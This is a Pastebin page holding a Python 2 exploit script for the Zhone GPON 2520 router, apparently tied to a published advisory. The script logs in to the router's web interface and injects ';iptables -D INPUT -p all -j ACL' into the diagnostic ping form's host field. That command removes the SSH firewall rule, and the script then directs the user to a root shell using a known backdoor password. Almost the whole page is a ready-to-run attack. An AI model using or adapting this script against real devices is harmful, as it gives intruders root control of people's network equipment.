API tools faq
paste
Advertisement
Guest User

Command Execution and Backdoor in Zhone GPON-252

a guest
Jun 21st, 2017
468
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.11 KB | None | 0 0
raw download clone embed print report
  1. # http://websec.ca/advisories/view/Zhone-GPON-2520-remote-root-shell-backdoor
  2.  
  3. #!/usr/bin/python2
  4. from httplib2 import Http
  5. from urllib import urlencode
  6. import sys,time
  7.  
  8. # main function
  9. if __name__ == "__main__":
  10.     if (len(sys.argv) != 4):
  11.         print '*********************************************************************************'
  12.         print ' GPON Zhone R4.0.2.566b RCE & Backdoor'
  13.         print ' Tested on'
  14.         print ' GPON Zhone 2520'
  15.         print ' Hardware: 0040-48-02'
  16.         print ' Software: R4.0.2.566b'
  17.         print ' '
  18.         print ' Usage : python', sys.argv[0] + ' <web_user> <web_pass>'
  19.         print ' Ex : python',sys.argv[0] + ' 192.168.15.1 root admin'
  20.         print ' Author : Kaczinski lramirez@websec.mx '
  21.         print ' URL : http://www.websec.mx/advisories'
  22.         print '*********************************************************************************'
  23.         sys.exit()
  24.  
  25. HOST = sys.argv[1]
  26. USER = sys.argv[2]
  27. PASS = sys.argv[3]
  28.  
  29. print '*********************************************************************************'
  30. print '[+] Logging in to the router: '+ HOST
  31. print '[+] User: '+USER
  32. print '[+] Pass: '+PASS
  33.  
  34. h = Http()
  35. h.follow_redirects = True
  36. data = dict(XWebPageName="index", username=USER, password=PASS)
  37. resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
  38. result = content.find("")
  39.  
  40. if result < 0:
  41.     print '[-] Authentication failed'
  42.     print '*********************************************************************************'
  43. else:
  44.     print '[+] Authentication succeeded'
  45.     print '[+] Deleting the firewall rule that blocks SSH'
  46.     data = dict(XWebPageName="diag", dest_host=";iptables -D INPUT -p all -j ACL", wan_conlist="default", diag_action="ping")
  47.     resp, content = h.request("http://" + HOST + "/GponForm/diag_ZForm", "POST", urlencode(data))
  48.     print '[+] The firewall rule should have been disabled, please ssh root@' + HOST + ' using admin as password to get your root shell :)'
  49.     print '[+] Done'
  50.     resp, content = h.request("http://" + HOST + "/logout.html", "GET")
  51.  
  52. sys.exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!